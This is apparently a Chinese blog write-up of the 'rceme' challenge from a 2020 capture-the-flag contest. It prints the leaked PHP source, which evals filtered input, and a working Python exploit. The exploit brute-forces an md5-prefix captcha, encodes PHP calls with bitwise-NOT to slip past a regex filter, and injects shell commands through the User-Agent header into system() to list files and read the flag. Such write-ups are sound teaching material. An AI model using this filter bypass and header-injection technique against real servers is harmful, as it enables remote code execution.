极客大挑战2020-rceme-wp

题目链接

源码提示有swp,访问.index.php.swp成功下载得到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
session_start();
if(!isset($_SESSION['code'])){
        $_SESSION['code'] = substr(md5(mt_rand().sha1(mt_rand)),0,5);
}

if(isset($_POST['cmd']) and isset($_POST['code'])){
        if(substr(md5($_POST['code']),0,5) !== $_SESSION['code']){
                die('<script>alert(\'Captcha error~\');history.back()</script>');
        }
        $_SESSION['code'] = substr(md5(mt_rand().sha1(mt_rand)),0,5);
        $code = $_POST['cmd'];
        if(strlen($code) > 70 or preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|\.|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/ixm',$code)){
                die('<script>alert(\'Longlone not like you~\');history.back()</script>');
        }else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){
                @eval($code);
                die();
        }
}
?>

发现有md5前5位比对校验,且当前$_SESSION['code']在页面中也有展现 因此可以爆破 然后就是无参函数构造了

爆破哈希可以查看生日攻击:哈希碰撞与生日攻击 - 阮一峰的网络日志 (ruanyifeng.com)

无参函数构造可见:https://antel0p3.github.io/2023/09/26/HNCTF2022-Canyource-wp/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import hashlib
import math
import requests
import re

def one(s):		
    ss = b"[~"
    for each in s:
        ss += (255 - ord(each)).to_bytes(1, 'little')
    ss += b"][~\xCF]("
    return ss
def get_not(a):	# 将命令转为[~\x8F\x8D\x96\x91\x8B\xA0\x8D][~\xCF]();的形式
    aa = a.split("(")
    s = b""
    for each in aa[:-1]:
        s += one(each)
    s += b")" * (len(aa) - 1) + b";"
    # print(s)
    return s

url = 'http://node4.anna.nssctf.cn:28583/'
sess = requests.session()	# 注意这里用session()是为了保持会话状态
res = sess.get(url=url)
sum = re.findall(',0,5[)]==(.....)', res.text)[0]	# 获取5位哈希值
print(sum)

code = ''	
for i in range(800000):	# 爆破  不成功多试几次
    md5 = hashlib.md5(str(i).encode())
    if md5.hexdigest()[:5] == sum:
        print(i)
        code = i
        break
1
2
res = sess.post(url=url, data={"cmd":get_not('phpinfo();'), "code":code})
print(res.text)

成功获取到phpinfo结果 渲染后查看 disabled_functions中没有禁用函数

1
2
3
4
5
res = sess.post(url=url, data={"cmd":get_not('print_r(getallheaders());'), "code":code})
# Array (
#    [Host] => node4.anna.nssctf.cn:28583
#    [User-Agent] => python-requests/2.31.0
#    ...)
1
2
3
4
5
6
headers = {"User-Agent": "ls"}	# 这里放要执行的命令
res = sess.post(url=url, headers=headers, data={"cmd":get_not('print_r(getallheaders());'), "code":code})
# Array (
#    [Host] => node4.anna.nssctf.cn:28583
#    [User-Agent] => ls
#    ...)
1
2
3
headers = {"User-Agent": "ls"}
res = sess.post(url=url, headers=headers, data={"cmd":get_not('print_r(next(getallheaders()));'), "code":code})
# ls
1
2
3
headers = {"User-Agent": "ls /;cat /fll*"}
res = sess.post(url=url, headers=headers, data={"cmd":get_not('system(next(getallheaders()));'), "code":code})
# flll1114gggggg ...
本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
⬆︎TOP